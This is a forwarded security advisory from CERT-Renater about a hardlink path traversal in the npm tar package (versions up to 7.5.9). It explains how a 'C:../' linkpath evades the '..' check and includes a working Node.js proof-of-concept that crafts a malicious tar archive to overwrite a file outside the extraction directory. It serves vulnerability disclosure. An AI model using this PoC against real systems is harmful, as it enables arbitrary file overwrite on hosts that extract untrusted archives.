Ce mail provient de l'extérieur, restons vigilants ===================================================================== CERT-Renater Note d'Information No. 2026/VULN259 _____________________________________________________________________ DATE : 05/03/2026 HARDWARE PLATFORM(S): / OPERATING SYSTEM(S): Systems running tar (npm) versions prior to 7.5.10. ===================================================================== https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96 _____________________________________________________________________ Hardlink Path Traversal via Drive-Relative Linkpath High isaacs published GHSA-qffp-2rhf-9h96 Mar 4, 2026 Package tar (npm) Affected versions <= 7.5.9 Patched versions 7.5.10 Description Summary tar (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. Details The extraction logic in Unpack[STRIPABSOLUTEPATH] checks for .. segments before stripping absolute roots. What happens with linkpath: "C:../target.txt": Split on / gives ['C:..', 'target.txt'], so parts.includes('..') is false. stripAbsolutePath() removes C: and rewrites the value to ../target.txt. Hardlink creation resolves this against extraction cwd and escapes one directory up. Writing through the extracted hardlink overwrites the outside file. This is reachable in standard usage (tar.x({ cwd, file })) when extracting attacker-controlled tar archives. PoC Tested on Arch Linux with tar@7.5.9. PoC script (poc.cjs): const fs = require('fs') const path = require('path') const { Header, x } = require('tar') const cwd = process.cwd() const target = path.resolve(cwd, '..', 'target.txt') const tarFile = path.join(process.cwd(), 'poc.tar') fs.writeFileSync(target, 'ORIGINAL\n') const b = Buffer.alloc(1536) new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0) fs.writeFileSync(tarFile, b) x({ cwd, file: tarFile }).then(() => { fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n') process.stdout.write(fs.readFileSync(target, 'utf8')) }) Run: cd test-workspace node poc.cjs && ls -l ../target.txt Observed output: PWNED -rw-r--r-- 2 joshuavr joshuavr 6 Mar 4 19:25 ../target.txt PWNED confirms outside file content overwrite. Link count 2 confirms the extracted file and ../target.txt are hardlinked. Impact This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction. Realistic scenarios: CLI tools unpacking untrusted tarballs into a working directory build/update pipelines consuming third-party archives services that import user-supplied tar files Severity High 8.2/ 10 CVSS v4 base metrics Exploitability Metrics Attack Vector Local Attack Complexity Low Attack Requirements None Privileges Required None User interaction Passive Vulnerable System Impact Metrics Confidentiality None Integrity High Availability Low Subsequent System Impact Metrics Confidentiality None Integrity High Availability Low CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L CVE ID No known CVE Weaknesses Weakness CWE-22 Weakness CWE-59 Credits @Jvr2022 Jvr2022 Reporter ========================================================= + CERT-RENATER | tel : 01-53-94-20-44 + + 23/25 Rue Daviel | fax : 01-53-94-20-41 + + 75013 Paris | email:cert@support.renater.fr + =========================================================